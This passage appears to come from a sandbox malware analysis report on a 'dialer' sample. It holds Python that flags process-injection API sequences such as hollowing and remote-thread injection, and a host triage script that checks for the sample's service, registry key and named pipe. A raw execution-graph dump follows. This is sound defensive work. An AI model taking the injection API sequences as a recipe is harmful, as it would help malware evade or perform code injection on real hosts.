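    "CreateProcessW", "VirtualAllocEx", "WriteProcessMemory", "WriteProcessMemory",
    "VirtualAlloc", "GetThreadContext", "WriteProcessMemory", "SetThreadContext",
    "ResumeThread", "OpenProcess", "TerminateProcess",
]

# APIs with A/W variants that should compare equal to their base name.
_AW_APIS = {"CreateProcess", "CreateFile", "CreateService", "OpenService"}


def normalize(api: str) -> str:
    """Fold CreateProcessW / CreateProcessA -> CreateProcess; leave others unchanged."""
    if api[-1] in "AW" and api[:-1] in _AW_APIS:
        return api[:-1]
    return api


@dataclass(frozen=True)
class Pattern:
    name: str
    attack_id: str                               # assumed MITRE ATT&CK mapping
    ordered: tuple[str, ...]                     # must appear in this relative order
    any_of: tuple[frozenset[str], ...] = ()      # each set: at least one member anywhere


PATTERNS = (
    Pattern("process hollowing / thread-context hijack of a new process", "T1055.012",
            ("CreateProcess", "WriteProcessMemory", "GetThreadContext",
             "SetThreadContext", "ResumeThread"),
            (frozenset({"VirtualAllocEx", "NtAllocateVirtualMemory"}),)),
    Pattern("remote thread injection", "T1055.002",
            ("OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")),
    Pattern("thread execution hijacking", "T1055.003",
            ("OpenThread", "SuspendThread", "GetThreadContext", "SetThreadContext",
             "ResumeThread")),
)


def is_subsequence(calls: list[str], needle: tuple[str, ...]) -> bool:
    """True if every element of needle occurs in calls in that relative order.
    The shared iterator makes each 'in' test resume where the previous one stopped."""
    it = iter(calls)
    return all(n in it for n in needle)


def classify(calls: list[str]) -> list[tuple[str, str]]:
    """Return (pattern name, ATT&CK id) for every pattern the sequence satisfies.
    Order matters: the same APIs in a different order (e.g. ResumeThread before
    SetThreadContext) do not match, which keeps ordinary process launchers quiet."""
    seq = [normalize(c) for c in calls]
    present = set(seq)
    hits = []
    for p in PATTERNS:
        if is_subsequence(seq, p.ordered) and all(present & group for group in p.any_of):
            hits.append((p.name, p.attack_id))
    return hits


if __name__ == "__main__":
    for name, tid in classify(DIALER_INJECT_SEQUENCE):
        print(f"{tid}: {name}")
```

Run on the transcribed sequence it reports only the hollowing pattern; the OpenProcess/TerminateProcess pair does not trigger the remote-thread pattern because it appears after VirtualAllocEx and there is no CreateRemoteThread.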

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                                                                      • String ID: dialersvc64
                                                                                                                                                                                                      • API String ID: 4184240511-3881820561
                                                                                                                                                                                                      • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                                                                                                      • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Delete$CloseEnumOpen
                                                                                                                                                                                                      • String ID: SOFTWARE\dialerconfig
                                                                                                                                                                                                      • API String ID: 3013565938-461861421
                                                                                                                                                                                                      • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                                                                                      • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Write$CloseCreateHandle
                                                                                                                                                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                                                                                                      • API String ID: 148219782-3440882674
                                                                                                                                                                                                      • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                                                                                                      • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%
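The three functions above expose the sample's host artifacts as string references: the service name dialersvc64, the registry key SOFTWARE\dialerconfig (enumerated and deleted by the Delete$CloseEnumOpen function) and the named pipe \\.\pipe\dialercontrol_redirect64. The following is an added example, not code from the report, that checks a host for those three artifacts. The registry hive is not stated in the report, so checking both HKLM and HKCU is the example's assumption; live collection is Windows-only and uses only the standard library, while the matching is kept pure so it can be exercised against a constructed inventory on any platform.

```python
"""Host triage for the three artifacts named in the report's string references:
service 'dialersvc64', registry key 'SOFTWARE\\dialerconfig' and named pipe
'\\\\.\\pipe\\dialercontrol_redirect64'.

Added example, not code from the report. The hive of the registry key is not
stated in the report, so both HKLM and HKCU are checked (assumption). Live
collection is Windows-only and stdlib-only; matching is pure so it can run
against a constructed inventory anywhere.
"""
from __future__ import annotations

import os
import sys
from dataclasses import dataclass, field

SERVICE_NAME = "dialersvc64"              # String ID in the report
REG_SUBKEY = r"SOFTWARE\dialerconfig"     # String ID in the report (hive unknown)
PIPE_NAME = "dialercontrol_redirect64"    # leaf of \\.\pipe\dialercontrol_redirect64


@dataclass
class HostInventory:
    services: list[str] = field(default_factory=list)   # SCM service (key) names
    reg_keys: list[str] = field(default_factory=list)   # full paths, e.g. HKLM\SOFTWARE\dialerconfig
    pipes: list[str] = field(default_factory=list)      # leaf names under \\.\pipe\


def match_artifacts(inv: HostInventory) -> dict[str, list[str]]:
    """Return the subset of report artifacts present in the inventory.
    Comparisons are case-insensitive because service, registry and pipe names are."""
    hits: dict[str, list[str]] = {
        "service": [s for s in inv.services if s.lower() == SERVICE_NAME],
        "registry": [k for k in inv.reg_keys if k.lower().endswith(REG_SUBKEY.lower())],
        "pipe": [p for p in inv.pipes if p.lower() == PIPE_NAME],
    }
    return {kind: names for kind, names in hits.items() if names}


def _subkeys(hive: int, path: str) -> list[str]:
    """Enumerate immediate subkeys of hive\\path; empty list if the key is absent."""
    import winreg
    try:
        key = winreg.OpenKey(hive, path)
    except OSError:
        return []
    names: list[str] = []
    with key:
        i = 0
        while True:
            try:
                names.append(winreg.EnumKey(key, i))
            except OSError:          # ERROR_NO_MORE_ITEMS ends the enumeration
                break
            i += 1
    return names


def collect_windows() -> HostInventory:
    """Live inventory (Windows only)."""
    import winreg
    inv = HostInventory()
    # Installed services are the subkeys of the Services key; no SCM call needed.
    inv.services = _subkeys(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services")
    for label, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE), ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            with winreg.OpenKey(hive, REG_SUBKEY):
                inv.reg_keys.append(f"{label}\\{REG_SUBKEY}")
        except OSError:
            pass
    try:
        # Listing the pipe device (\\.\pipe\) enumerates the live named pipes.
        inv.pipes = os.listdir("\\\\.\\pipe\\")
    except OSError:
        pass
    return inv


# Constructed inventory for an offline run (not taken from the sandbox host).
SAMPLE_INVENTORY = HostInventory(
    services=["BITS", "DialerSvc64", "Spooler"],
    reg_keys=["HKLM\\SOFTWARE\\Microsoft", "HKLM\\SOFTWARE\\dialerconfig"],
    pipes=["lsass", "DialerControl_Redirect64", "ntsvcs"],
)

if __name__ == "__main__":
    inventory = collect_windows() if sys.platform == "win32" else SAMPLE_INVENTORY
    print(match_artifacts(inventory) or "no report artifacts found")
```

A hit on the pipe alone is the most useful of the three during live response: the pipe only exists while the injected component is running, whereas the service key and SOFTWARE\dialerconfig may already have been removed by the sample's own cleanup function.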

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                      • String ID: ntdll.dll
                                                                                                                                                                                                      • API String ID: 1646373207-2227199552
                                                                                                                                                                                                      • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                                                                                                      • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:2.2%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:2.3%
                                                                                                                                                                                                      Total number of Nodes:897
                                                                                                                                                                                                      Total number of Limit Nodes:2
[execution graph rendering removed; the node-level listing is not readable as text and is truncated in the source. APIs named in the graph nodes: VirtualProtect, VirtualQuery, GetLastError, memcpy, malloc, free, NtAlpcOpenSenderProcess, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsGetValue, signal, __set_app_type, __setusermatherr, fprintf, strlen, Sleep, _amsg_exit, _initterm, SetUnhandledExceptionFilter, _cexit, memset, wcslen, _wcsnicmp, wcscpy, wcscat.]
2366->2377 2379 140004fc6 wcslen 2366->2379 2383 14000502e _wcsnicmp 2366->2383 2384 140005b7c 2366->2384 2385 140005c27 wcslen 2366->2385 2387 1400057d5 memset 2366->2387 2388 1400027d0 11 API calls 2366->2388 2389 1400059d0 memset 2366->2389 2390 14000583b memset 2366->2390 2391 140005895 wcscpy wcscat wcslen 2366->2391 2776 1400014d6 2366->2776 2821 140001521 2366->2821 2919 140001431 2366->2919 2367->2324 2367->2330 2367->2333 2367->2347 2367->2350 2367->2358 2367->2364 2368 140004357 wcsstr 2367->2368 2550 140001599 2367->2550 2563 1400015a8 2367->2563 2368->2354 2368->2367 2370 14000153f 2 API calls 2369->2370 2370->2366 2373 14000153f 2 API calls 2371->2373 2374 14000157b 2 API calls 2372->2374 2373->2366 2374->2366 2378 140001422 2 API calls 2375->2378 2376->2366 2377->2366 2378->2366 2380 1400015a8 2 API calls 2379->2380 2380->2366 2383->2366 2384->2265 2386 1400015a8 2 API calls 2385->2386 2386->2366 2387->2366 2387->2389 2388->2366 2389->2366 2390->2366 2850 140001422 2391->2850 2394 140001394 2 API calls 2393->2394 2395 14000154e 2394->2395 2396 140001394 2 API calls 2395->2396 2397 14000155d 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000156c 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000157b 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000158a 2402->2403 2404 140001394 2 API calls 2403->2404 2405 140001599 2404->2405 2406 140001394 2 API calls 2405->2406 2407 1400015a8 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015b7 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015c6 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015d5 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015e4 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015f3 2416->2417 2417->2288 2418 140001503 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000150d 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001512 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001521 
2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001530 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000153f 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000154e 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000155d 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000156c 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000157b 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000158a 2437->2438 2439 140001394 2 API calls 2438->2439 2440 140001599 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015a8 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015b7 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015c6 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015d5 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015e4 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015f3 2451->2452 2452->2291 2453 14000156c 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000157b 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000158a 2456->2457 2458 140001394 2 API calls 2457->2458 2459 140001599 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015a8 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015b7 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015c6 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015d5 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015e4 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015f3 2470->2471 2471->2291 2472 14000145e 2471->2472 2473 140001394 2 API calls 2472->2473 2474 14000146d 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000147c 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000148b 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000149a 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014a9 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014b8 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014c7 
2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014d6 2487->2488 2489 1400014e5 2488->2489 2490 140001394 2 API calls 2488->2490 2491 140001394 2 API calls 2489->2491 2490->2489 2492 1400014ef 2491->2492 2493 1400014f4 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014fe 2495->2496 2497 140001503 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 14000150d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 140001512 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001521 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001530 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000153f 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000154e 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000155d 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000156c 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000157b 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000158a 2517->2518 2519 140001394 2 API calls 2518->2519 2520 140001599 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015a8 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015b7 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015c6 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015d5 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015e4 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015f3 2531->2532 2532->2291 2534 140001394 2 API calls 2533->2534 2535 14000158a 2534->2535 2536 140001394 2 API calls 2535->2536 2537 140001599 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400015a8 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015b7 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015c6 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015d5 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015e4 2546->2547 2548 140001394 2 API 
calls 2547->2548 2549 1400015f3 2548->2549 2549->2367 2551 140001394 2 API calls 2550->2551 2552 1400015a8 2551->2552 2553 140001394 2 API calls 2552->2553 2554 1400015b7 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015c6 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015d5 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015e4 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015f3 2561->2562 2562->2367 2564 140001394 2 API calls 2563->2564 2565 1400015b7 2564->2565 2566 140001394 2 API calls 2565->2566 2567 1400015c6 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015d5 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015e4 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015f3 2572->2573 2573->2367 2575 140001394 2 API calls 2574->2575 2576 14000147c 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000148b 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000149a 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400014a9 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014b8 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014c7 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014d6 2587->2588 2589 1400014e5 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014ef 2591->2592 2593 1400014f4 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014fe 2595->2596 2597 140001503 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 14000150d 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001512 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001521 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001530 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000153f 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000154e 2609->2610 2611 140001394 2 API calls 
2610->2611 2612 14000155d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000156c 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000157b 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000158a 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001599 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015a8 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015b7 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015c6 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015d5 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015e4 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015f3 2631->2632 2632->2332 2633 140001530 2632->2633 2634 140001394 2 API calls 2633->2634 2635 14000153f 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000154e 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000155d 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000156c 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000157b 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000158a 2644->2645 2646 140001394 2 API calls 2645->2646 2647 140001599 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015a8 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2337 2659->2338 2661 140001394 2 API calls 2660->2661 2662 1400014b8 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400014c7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014d6 2665->2666 2667 1400014e5 2666->2667 2668 140001394 2 API calls 2666->2668 2669 140001394 2 API calls 2667->2669 2668->2667 2670 1400014ef 2669->2670 2671 1400014f4 2670->2671 2672 140001394 2 API calls 2670->2672 2673 140001394 2 API calls 
2671->2673 2672->2671 2674 1400014fe 2673->2674 2675 140001503 2674->2675 2676 140001394 2 API calls 2674->2676 2677 140001394 2 API calls 2675->2677 2676->2675 2678 14000150d 2677->2678 2679 140001394 2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2348 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 
2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 140001503 2739->2740 2741 140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2348 2775->2355 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 
2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2366 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2366 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API 
